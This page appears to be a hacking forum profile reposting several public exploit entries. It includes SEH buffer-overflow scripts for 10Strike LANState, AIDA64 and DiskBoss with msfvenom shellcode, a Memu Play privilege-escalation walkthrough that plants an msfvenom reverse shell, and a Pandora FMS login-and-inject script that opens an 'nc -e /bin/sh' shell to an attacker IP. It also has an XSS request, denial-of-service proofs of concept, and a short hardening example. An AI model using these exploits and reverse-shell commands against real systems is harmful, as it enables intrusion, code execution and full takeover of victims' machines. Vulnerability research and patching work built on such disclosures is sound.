
Everything posted by HireHackking
-
10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)
# Exploit Title: 10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)
# Date: 2020-04-01
# Exploit Author: Hodorsec
# Version: v9.32 x86
# Software Link: https://www.10-strike.com/lanstate/lanstate-setup.exe
# Vendor Homepage: https://www.freecommander.com
# Tested on: Win7 x86 SP1 - Build 7601

# Description:
# - Exploits the "Force Check" option when listing the Host Checks in option "Check List". Entering an overly long string results in a crash which overwrites SEH.

# Reproduction:
# - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's.
# - Run the script, a TXT file will be generated
# - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c)
# - Open LANState, use any "Map", for example the "demo_map"
# - Click on tab "Home", click option "Check List"
# - Right-click on any existing hostname and click "Edit"
# - Paste the value from clipboard in the field "Host address (name)"
# - Next, Next, Finish
# - In the "List of checks" overview, select the modified host and press the spacebar (Force Check)
# - Check results

# WinDBG initial crash output using only A's:
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00002759 ebx=0012f838 ecx=000007f6 edx=0012f880 esi=0781bf78 edi=00130000
# eip=00402e57 esp=0012f7d8 ebp=0012f99c iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\10-Strike LANState\LANState.exe
# LANState+0x2e57:
# 00402e57 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
# 0:000> g
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=0012f98c ebx=0012f98c ecx=05250858 edx=41414141 esi=00000002 edi=0012f7f0
# eip=004053e6 esp=0012f7f8 ebp=0012f99c iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
# LANState+0x53e6:
# 004053e6 8b4af8          mov     ecx,dword ptr [edx-8] ds:0023:41414139=????????
# 0:000> g
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=41414141 edx=77f0720d esi=00000000 edi=00000000
# eip=41414141 esp=0012f298 ebp=0012f2b8 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
# 41414141 ??              ???

#!/usr/bin/python
import sys, struct

# Filename
filename = "10_strike_lanstate-poc.txt"

# Maximum length
maxlen = 10000

# Shellcode, using alphanum chars due to bytes considered to be bad above \x7f
# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -v shellcode
# Payload size: 447 bytes
shellcode = (
"\xdb\xdc\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x78\x68\x6d\x52\x65\x50\x37\x70\x77\x70\x43\x50\x4d\x59"
"\x39\x75\x36\x51\x59\x50\x32\x44\x6e\x6b\x32\x70\x46\x50\x6e"
"\x6b\x70\x52\x34\x4c\x6e\x6b\x61\x42\x45\x44\x4c\x4b\x54\x32"
"\x47\x58\x36\x6f\x6e\x57\x53\x7a\x66\x46\x46\x51\x79\x6f\x4e"
"\x4c\x37\x4c\x51\x71\x53\x4c\x44\x42\x44\x6c\x61\x30\x4a\x61"
"\x68\x4f\x66\x6d\x73\x31\x49\x57\x59\x72\x58\x72\x30\x52\x56"
"\x37\x4e\x6b\x52\x72\x34\x50\x6c\x4b\x33\x7a\x35\x6c\x6c\x4b"
"\x42\x6c\x57\x61\x74\x38\x6d\x33\x33\x78\x77\x71\x4b\x61\x32"
"\x71\x6e\x6b\x51\x49\x77\x50\x76\x61\x6a\x73\x6e\x6b\x61\x59"
"\x67\x68\x79\x73\x57\x4a\x42\x69\x4e\x6b\x37\x44\x6c\x4b\x43"
"\x31\x4e\x36\x45\x61\x6b\x4f\x6c\x6c\x6a\x61\x48\x4f\x34\x4d"
"\x47\x71\x5a\x67\x37\x48\x39\x70\x62\x55\x4b\x46\x65\x53\x63"
"\x4d\x39\x68\x67\x4b\x73\x4d\x46\x44\x53\x45\x79\x74\x76\x38"
"\x4c\x4b\x63\x68\x66\x44\x43\x31\x48\x53\x72\x46\x4e\x6b\x76"
"\x6c\x70\x4b\x4e\x6b\x61\x48\x57\x6c\x46\x61\x79\x43\x6c\x4b"
"\x54\x44\x6e\x6b\x57\x71\x68\x50\x6e\x69\x30\x44\x76\x44\x45"
"\x74\x53\x6b\x61\x4b\x65\x31\x62\x79\x31\x4a\x30\x51\x39\x6f"
"\x59\x70\x63\x6f\x71\x4f\x50\x5a\x6c\x4b\x56\x72\x6a\x4b\x6c"
"\x4d\x73\x6d\x30\x6a\x77\x71\x6e\x6d\x4d\x55\x4e\x52\x37\x70"
"\x75\x50\x63\x30\x52\x70\x63\x58\x56\x51\x4e\x6b\x42\x4f\x4e"
"\x67\x69\x6f\x49\x45\x4d\x6b\x58\x70\x4d\x65\x6d\x72\x50\x56"
"\x75\x38\x6e\x46\x6f\x65\x6f\x4d\x6d\x4d\x39\x6f\x58\x55\x75"
"\x6c\x63\x36\x73\x4c\x76\x6a\x6b\x30\x59\x6b\x4d\x30\x52\x55"
"\x74\x45\x6f\x4b\x43\x77\x42\x33\x63\x42\x62\x4f\x51\x7a\x77"
"\x70\x73\x63\x69\x6f\x58\x55\x72\x43\x30\x61\x72\x4c\x31\x73"
"\x46\x4e\x45\x35\x63\x48\x63\x55\x47\x70\x41\x41"
)

# Offsets
crash_ebp = 228
crash_nseh = 236
crash_seh = crash_nseh + 4

# Variables
nops = "\x90" * 16                                  # Nops

# Prefix
prefix = "A" * crash_nseh                           # Filler
nseh = "\x71\x06\x70\x04"                           # JNO / JO: jump over NSEH/SEH
seh = struct.pack("<L", 0x0132730f)                 # call dword ptr ss:[ebp-04] # [LANState.exe]
suffix = nops                                       # Old-school NOP'ing
suffix += shellcode                                 # Magic!
suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix))  # Filler

# Concatenate string for payload
payload = prefix + nseh + seh + suffix

# Put it all together
try:
    file = open(filename, "wb")
    file.write(payload)
    file.close()
    print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully"
except:
    print "[!] Error creating file!"
    sys.exit(0)
-
Memu Play 7.1.3 - Insecure Folder Permissions
# Exploit Title: Memu Play 7.1.3 - Insecure Folder Permissions
# Discovery by: chuyreds
# Discovery Date: 2020-03-08
# Vendor Homepage: https://www.memuplay.com/
# Software Link : https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release
# Tested Version: 7.1.3
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es

# Description:
# Memu Play 7.1.3 suffers from Privilege Escalation due to insecure file permissions

# Prerequisites
# Local, Low privilege access with restart capabilities

# Details
# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.
# A low privilege account is able to rename the MemuService.exe file located in this same path and replace
# it with a malicious file that would connect back to an attacking computer giving system level privileges
# (nt authority\system) due to the service running as Local System.
# While a low privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file.

C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F)
                                                      BUILTIN\Administradores:(I)(F)
                                                      BUILTIN\Usuarios:(I)(F)
                                                      NT AUTHORITY\SYSTEM:(I)(F)
                                                      APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                                      APPLICATION PACKAGE AUTHORITY\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX)

Se procesaron correctamente 1 archivos; error al procesar 0 archivos

C:\>sc qc MEmuSVC
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: MEmuSVC
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : MEmuSVC
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

# Proof of Concept

1. Generate malicious .exe on attacking machine
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe > /var/www/html/MemuService.exe

2. Setup listener and ensure apache is running on attacking machine
nc -lvp 443
service apache2 start

3. Download malicious .exe on victim machine
Open browser to http://192.168.1.130/MemuService.exe and download

4. Overwrite file and copy malicious .exe.
Rename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak
Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\

5. Restart victim machine

6. Reverse Shell on attacking machine opens
C:\Windows\system32>whoami
whoami
nt authority\system
-
AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)
# Exploit Title: AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)
# Date: 2020-04-02
# Exploit Author: Hodorsec
# Version: v6.20.5300
# Software Link: http://download.aida64.com/aida64engineer620.exe
# Vendor Homepage: https://www.aida64.com/products/aida64-engineer
# Tested on: Win7 x86 SP1 - Build 7601

# Description:
# - Exploits the "Report File" buffer when sending an e-mail report via the Report wizard. Entering an overly long string results in a crash which overwrites SEH.

# Reproduction:
# - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's.
# - Run the script, a TXT file will be generated
# - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c)
# - Open AIDA64 Engineer
# - First, click on "File", "Preferences"
# - Click menu "Report", "Report File"
# - Enter a long string in the field "File name"
# - Set "File extension" to automatic, as by default
# - Click OK
# - Second, in the main menu, click "Report" which shows the "Report Wizard"
# - Next, "System Summary only", next, "Plain Text", Finish
# - Click the button "Send In E-mail"
# - Check results

# WinDBG initial crash output using only A's:
# (994.998): Access violation - code c0000005 (!!! second chance !!!)
# eax=03ac1048 ebx=03ac100c ecx=03ac109c edx=77f070f4 esi=03ac1140 edi=00000000
# eip=77f133a8 esp=03ac0fc8 ebp=03ac1000 iopl=0         nv up ei pl nz ac po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
# ntdll!RtlAcquireSRWLockShared+0x1a:
# 77f133a8 8365f400        and     dword ptr [ebp-0Ch],0 ss:0023:03ac0ff4=????????

#!/usr/bin/python
import sys, struct

filename = "aida64_engineer_poc.txt"

# Maximum length
maxlen = 5000

# Shellcode, using alphanum chars due to bytes considered to be bad above \x7f
# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -b '\x00\x0a\x0d' bufferregister=eax
# Payload size: 440 bytes
shellcode = (
"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x49\x78\x6d\x52\x33\x30"
"\x45\x50\x45\x50\x53\x50\x6b\x39\x6d\x35\x36\x51\x49\x50\x43"
"\x54\x6e\x6b\x52\x70\x54\x70\x6c\x4b\x51\x42\x66\x6c\x4c\x4b"
"\x62\x72\x52\x34\x6e\x6b\x54\x32\x46\x48\x54\x4f\x6d\x67\x52"
"\x6a\x57\x56\x36\x51\x6b\x4f\x4e\x4c\x47\x4c\x31\x71\x71\x6c"
"\x53\x32\x36\x4c\x37\x50\x5a\x61\x6a\x6f\x54\x4d\x77\x71\x5a"
"\x67\x7a\x42\x38\x72\x70\x52\x46\x37\x4e\x6b\x53\x62\x52\x30"
"\x6c\x4b\x52\x6a\x47\x4c\x4c\x4b\x50\x4c\x67\x61\x51\x68\x78"
"\x63\x43\x78\x56\x61\x4a\x71\x53\x61\x6c\x4b\x33\x69\x55\x70"
"\x37\x71\x6a\x73\x4c\x4b\x43\x79\x72\x38\x49\x73\x46\x5a\x32"
"\x69\x4c\x4b\x44\x74\x6e\x6b\x67\x71\x58\x56\x54\x71\x6b\x4f"
"\x6e\x4c\x49\x51\x78\x4f\x44\x4d\x63\x31\x68\x47\x30\x38\x79"
"\x70\x30\x75\x68\x76\x43\x33\x51\x6d\x69\x68\x75\x6b\x61\x6d"
"\x74\x64\x44\x35\x78\x64\x52\x78\x6c\x4b\x73\x68\x74\x64\x57"
"\x71\x68\x53\x31\x76\x4c\x4b\x46\x6c\x32\x6b\x6e\x6b\x76\x38"
"\x47\x6c\x43\x31\x6b\x63\x6c\x4b\x33\x34\x6e\x6b\x46\x61\x38"
"\x50\x4c\x49\x77\x34\x31\x34\x61\x34\x43\x6b\x71\x4b\x53\x51"
"\x42\x79\x33\x6a\x62\x71\x6b\x4f\x4b\x50\x53\x6f\x61\x4f\x52"
"\x7a\x4c\x4b\x62\x32\x68\x6b\x6c\x4d\x33\x6d\x51\x7a\x37\x71"
"\x4e\x6d\x4d\x55\x38\x32\x75\x50\x77\x70\x63\x30\x50\x50\x55"
"\x38\x66\x51\x6e\x6b\x62\x4f\x6c\x47\x39\x6f\x59\x45\x4f\x4b"
"\x78\x70\x58\x35\x49\x32\x52\x76\x53\x58\x4c\x66\x6c\x55\x6d"
"\x6d\x4d\x4d\x79\x6f\x59\x45\x65\x6c\x46\x66\x51\x6c\x64\x4a"
"\x4f\x70\x39\x6b\x59\x70\x64\x35\x47\x75\x6d\x6b\x73\x77\x66"
"\x73\x42\x52\x42\x4f\x62\x4a\x75\x50\x31\x43\x59\x6f\x5a\x75"
"\x51\x73\x33\x51\x62\x4c\x55\x33\x46\x4e\x70\x65\x70\x78\x53"
"\x55\x65\x50\x41\x41"
)

# Align the registers
# ESI = 04aaefc0, Buffer = 04abfb6c. Buffer - ESI = 0x010b8d
align_eax = (
"\x56"                  # PUSH ESI
"\x58"                  # POP EAX
"\x66\x05\x3f\x10"      # ADD AX,0x103f     # EAX = 0x04aaffff
"\x40"                  # INC EAX           # EAX = 0x04ab0000
"\x66\x05\x01\x7F"      # ADD AX,0x7f01     # EAX = 0x04ab7f01
"\x66\x05\x6b\x7c"      # ADD AX,0x7c6b     # EAX = 0x04abfb6c
"\x50"                  # PUSH EAX
)

# Offsets
crash_ebp = 307
crash_esi = 1583
crash_seh = 319
crash_nseh = crash_seh - 4

# Variables
ascii_nop = "\x47"                                  # Doesn't do anything particular for this program
nops = ascii_nop * 32                               # ASCII NOP's amount

# Prefix
prefix = "A" * crash_nseh
nseh = "\x71\x06\x70\x04"                           # JNO SHORT / JO SHORT: jump over NSEH/SEH
seh = struct.pack("<L", 0x0121076e)                 # POP POP RET # aida64.exe
suffix = align_eax                                  # Align registers to execute shellcode
suffix += nops                                      # Some ASCII friendly NOP's
suffix += shellcode                                 # Magic!
suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix))  # Filler

# Concatenate string for payload
payload = prefix + nseh + seh + suffix

# Put it all together
try:
    file = open(filename, "wb")
    file.write(payload)
    file.close()
    print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully"
except:
    print "[!] Error creating file!"
    sys.exit(0)
-
DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)
# Exploit Title: DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)
# Vendor Homepage: https://www.diskboss.com/
# Software Link Download: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-04-01
# Vulnerable Software: DiskBoss
# Version: 7.7.14
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)

# Steps to Produce the Crash:
# 1.- Run python code: DiskbossLCE.py
# 2.- Copy content to clipboard
# 3.- Turn off DEP for diskbsg.exe
# 4.- Open "diskboss.exe" (diskbsg.exe)
# 5.- Go to "Command" > Search Files
# 6.- Click on second + icon (located at right side of "Search Disks, Directories and Network Shares")
# 7.- Click on "Add Input Directory"
# 8.- Paste ClipBoard into the "Directory" field
# 9.- Click on OK
# 10.- Calc.exe runs

#################################################################################################################################################

# Python "DiskbossLCE.py" Code:

f = open("DiskbossLCE.txt", "w")

# 0x650EA4CA : jmp ebx | [QtGui4.dll] (C:\Program Files\DiskBoss\bin\QtGui4.dll)
jmpebx = "\xCA\xA4\x0E\x65"

# msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed BufferRegister=EBX -f python -b "\x0a\x0d\x2f\x5c\x00"
buf = ""
buf += "\x53\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x79\x6c\x79\x78\x4e\x62\x73\x30\x63\x30\x67\x70\x73"
buf += "\x50\x4f\x79\x48\x65\x56\x51\x59\x50\x31\x74\x6c\x4b"
buf += "\x30\x50\x50\x30\x4c\x4b\x51\x42\x74\x4c\x6e\x6b\x51"
buf += "\x42\x74\x54\x4c\x4b\x44\x32\x77\x58\x44\x4f\x4c\x77"
buf += "\x70\x4a\x55\x76\x44\x71\x69\x6f\x4c\x6c\x45\x6c\x53"
buf += "\x51\x73\x4c\x55\x52\x74\x6c\x31\x30\x49\x51\x4a\x6f"
buf += "\x34\x4d\x43\x31\x7a\x67\x69\x72\x6c\x32\x72\x72\x71"
buf += "\x47\x6c\x4b\x42\x72\x54\x50\x6c\x4b\x70\x4a\x65\x6c"
buf += "\x4c\x4b\x70\x4c\x64\x51\x62\x58\x39\x73\x51\x58\x67"
buf += "\x71\x38\x51\x66\x31\x4c\x4b\x31\x49\x31\x30\x33\x31"
buf += "\x78\x53\x4c\x4b\x31\x59\x44\x58\x49\x73\x65\x6a\x51"
buf += "\x59\x6e\x6b\x30\x34\x4e\x6b\x73\x31\x58\x56\x56\x51"
buf += "\x4b\x4f\x6c\x6c\x5a\x61\x5a\x6f\x34\x4d\x65\x51\x58"
buf += "\x47\x35\x68\x4d\x30\x30\x75\x58\x76\x55\x53\x31\x6d"
buf += "\x49\x68\x45\x6b\x43\x4d\x74\x64\x32\x55\x4b\x54\x42"
buf += "\x78\x6c\x4b\x51\x48\x46\x44\x57\x71\x48\x53\x62\x46"
buf += "\x4e\x6b\x46\x6c\x50\x4b\x4c\x4b\x73\x68\x75\x4c\x43"
buf += "\x31\x79\x43\x4e\x6b\x36\x64\x6c\x4b\x45\x51\x6e\x30"
buf += "\x4e\x69\x30\x44\x56\x44\x57\x54\x51\x4b\x61\x4b\x73"
buf += "\x51\x51\x49\x50\x5a\x50\x51\x4b\x4f\x6b\x50\x33\x6f"
buf += "\x33\x6f\x72\x7a\x6c\x4b\x42\x32\x78\x6b\x4e\x6d\x31"
buf += "\x4d\x50\x6a\x56\x61\x6e\x6d\x4b\x35\x38\x32\x43\x30"
buf += "\x47\x70\x35\x50\x42\x70\x62\x48\x36\x51\x4e\x6b\x32"
buf += "\x4f\x6d\x57\x49\x6f\x4e\x35\x6f\x4b\x7a\x50\x4d\x65"
buf += "\x6c\x62\x32\x76\x71\x78\x6c\x66\x6e\x75\x4f\x4d\x6f"
buf += "\x6d\x4b\x4f\x5a\x75\x65\x6c\x46\x66\x33\x4c\x66\x6a"
buf += "\x6b\x30\x4b\x4b\x4d\x30\x53\x45\x34\x45\x4f\x4b\x53"
buf += "\x77\x64\x53\x64\x32\x30\x6f\x42\x4a\x43\x30\x50\x53"
buf += "\x59\x6f\x78\x55\x75\x33\x51\x71\x72\x4c\x73\x53\x36"
buf += "\x4e\x55\x35\x74\x38\x71\x75\x47\x70\x41\x41"

junk1 = "A" * 4096
junk2 = "C" * 1196

payload = junk1 + jmpebx + junk2 + buf

f.write(payload)
f.close()
-
Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution
# Exploit Title: Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution
# Build: PC170324 - MR 0
# Date: 2020-03-30
# Exploit Author: Basim Alabdullah
# Vendor homepage: http://pandorafms.org/
# Version: 7.0
# Software link: https://pandorafms.org/features/free-download-monitoring-software/
# Tested on: CentOS
#
# Authenticated Remote Code Execution
#
# Vulnerable file: extension/net_tools.php
# Vulnerable Code:
#
#     $traceroute = whereis_the_command ('traceroute');
#     if (empty($traceroute)) {
#         ui_print_error_message(__('Traceroute executable does not exist.'));
#     }
#     else {
#         echo "<h3>".__("Traceroute to "). $ip. "</h3>";
#         echo "<pre>";
# ---->   echo system ("$traceroute $ip");
#         echo "</pre>";
#

<?php
error_reporting(0);

$username = $argv[2];
$password = $argv[3];
$url = $argv[1]."/index.php?login=1";
$postinfo = "nick=".$username."&pass=".$password."&login_button=Login";
$attackerip = $argv[4];
$attackerport = $argv[5];
$payload = "127.0.0.1;{nc,-e,/bin/sh,".$attackerip.",".$attackerport."}";

if(!empty($argv[1])) {
    // Step 1: authenticate and store the session cookie in cookie.tmp
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_NOBODY, false);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.tmp");
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_REFERER, $url);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postinfo);
    curl_exec($ch);
    curl_close($ch);

    // Step 2: submit the traceroute form of the network_tools extension with the payload as select_ips
    $ch1 = curl_init();
    curl_setopt($ch1, CURLOPT_HEADER, false);
    curl_setopt($ch1, CURLOPT_NOBODY, false);
    curl_setopt($ch1, CURLOPT_URL, $argv[1]."/index.php?login=1&login=1&sec=estado&sec2=operation/agentes/ver_agente&tab=extension&id_agente=1&id_extension=network_tools");
    curl_setopt($ch1, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch1, CURLOPT_COOKIEFILE, "cookie.tmp");
    curl_setopt($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7");
    curl_setopt($ch1, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch1, CURLOPT_REFERER, $url);
    curl_setopt($ch1, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch1, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch1, CURLOPT_CUSTOMREQUEST, "POST");
    curl_setopt($ch1, CURLOPT_POST, 1);
    curl_setopt($ch1, CURLOPT_POSTFIELDS, "operation=2&select_ips=".$payload."&community=public&submit=Execute");
    curl_exec($ch1);
    curl_close($ch1);

    echo $payload."\n";
}
else {
    echo "\n\nphp exploit.php http://127.0.0.1/pandora_console/ username password attacker-ip attacker-port\n\n";
}
?>

#
# Persistent Cross-Site Scripting.
# The value of the similar_ids request parameter is copied into the value of an HTML tag attribute which is an event handler and is encapsulated in double quotation marks. The payload 23859';document.location=1//981xgeu3m was submitted in the similar_ids parameter. This input was echoed as 23859';document.location=1//981xgeu3m in the application's response.
#
# GET /pandora_console/ajax.php?page=include%2Fajax%2Fevents&get_extended_event=1&group_rep=1&event_rep=1&dialog_page=general&similar_ids=2123859'%3bdocument.location%3d1%2f%2f981xgeu3m&timestamp_first=1585865889&timestamp_last=1585865889&user_comment=&event_id=21&server_id=0&meta=0&childrens_ids=%5B0%2C12%2C8%2C4%2C9%2C2%2C10%2C13%2C11%5D&history=0 HTTP/1.1
# Host: pandorafms.host
# User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0
# Accept: text/html, */*; q=0.01
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Referer: http://pandorafms.host/pandora_console/index.php?sec=eventos&sec2=operation/events/events
# X-Requested-With: XMLHttpRequest
# Connection: close
# Cookie: clippy_is_annoying=1; PHPSESSID=tn2pdl4p1qiq4bta26psj0mcj1
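The root cause of the RCE above is the unquoted interpolation in `system("$traceroute $ip")`. The following is an added example, not Pandora FMS code, that places that pattern next to a hardened version which validates the target as an IP address or hostname and quotes it; the function names and the constructed inputs are assumptions for illustration.

```php
<?php
// Added example, not Pandora FMS code. Shows why `system("$traceroute $ip")`
// is exploitable and one way to harden it: validate $ip as an IP address or
// hostname, then pass it to the shell as a single quoted argument.
// Function names are assumptions for illustration.

// Mirrors the pattern reported in extension/net_tools.php: $ip is interpolated
// into the command line unquoted, so shell metacharacters in it are interpreted.
function build_traceroute_command_vulnerable(string $traceroute, string $ip): string
{
    return "$traceroute $ip";   // the original feeds this string to system()
}

// Accept only a literal IPv4/IPv6 address or a syntactically valid hostname.
function validate_traceroute_target(string $ip): ?string
{
    if (filter_var($ip, FILTER_VALIDATE_IP) !== false) {
        return $ip;
    }
    // Hostname: dot-separated labels of letters, digits and hyphens, 253 chars max.
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    if (strlen($ip) <= 253 && preg_match("/^(?:{$label}\\.)*{$label}$/i", $ip)) {
        return $ip;
    }
    return null;
}

// Hardened variant: reject anything that fails validation and quote what passes.
// Returns null when the caller should print an error instead of running anything.
function build_traceroute_command_hardened(string $traceroute, string $ip): ?string
{
    $target = validate_traceroute_target($ip);
    if ($target === null) {
        return null;
    }
    // escapeshellarg() is defence in depth: a validated hostname cannot contain
    // metacharacters, but quoting guarantees it arrives as exactly one argument.
    return escapeshellcmd($traceroute) . ' ' . escapeshellarg($target);
}

// Constructed inputs: three legitimate targets and one injection of the same
// shape as the one reported above (a ';' that terminates the traceroute command).
$traceroute = '/usr/bin/traceroute';
$inputs = ['8.8.8.8', '::1', 'pandorafms.host', '127.0.0.1; id'];

foreach ($inputs as $ip) {
    $vuln = build_traceroute_command_vulnerable($traceroute, $ip);
    $safe = build_traceroute_command_hardened($traceroute, $ip) ?? 'REJECTED';
    printf("input: %-16s vulnerable: %-36s hardened: %s\n", $ip, $vuln, $safe);
}
```

The last input shows the difference: the vulnerable builder hands `/usr/bin/traceroute 127.0.0.1; id` to the shell, while the hardened builder rejects it before any command is run.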
-
Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)
# Exploit Title: Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)
# Discovery by: 0xMoHassan
# Date: 2020-04-04
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
# Tested Version: 4.2.2.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows XP - SP3

# About App
# Product Key Explorer is a powerful product key finder solution for Windows, designed to help users find,
# recover and backup activation keys for +9000 popular software programs installed on local or network computers.

# PoC
# 1. Run the python script, it will create a new file "POC.txt"
# 2. Run Product Key Explorer and click on "Register -> Enter Registration Code"
# 3. Paste the content of POC.txt into the Field: 'Key'
# 4. Click 'ok'
# 5. Magic happen :)

#!/usr/bin/env python

buff = "\x41" * 500
buff += "\x41" * 500

try:
    f = open("POC.txt", "w")
    print "[+] Creating %s bytes payload.." % len(buff)
    f.write(buff)
    f.close()
    print "[+] POC created!"
except:
    print "POC cannot be created"
-
UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)
# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.uvnc.com/
# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
# Tested Version: 1.2.4.0
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to produce the crash:
# 1.- Run python code: UltraVNC_1.2.40-Launcher_RepeaterHost.py
# 2.- Open UltraVNC_1.2.40-Launcher_RepeaterHost.txt and copy content to clipboard
# 3.- Open UltraVNC Launcher
# 4.- Select "Properties"
# 5.- In "Repeater host" Paste Clipboard
# 6.- Click on "OK"
# 7.- Crashed

cod = "\x41" * 300
f = open('UltraVNC_1.2.40-Launcher_RepeaterHost.txt', 'w')
f.write(cod)
f.close()
-
Frigate 3.36 - Denial of Service (PoC)
# Exploit Title: Frigate 3.36 - Denial of Service (PoC)
# Date: 2020-04-05
# Exploit Author: inter
# Vendor Homepage: http://www.Frigate3.com/
# Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe
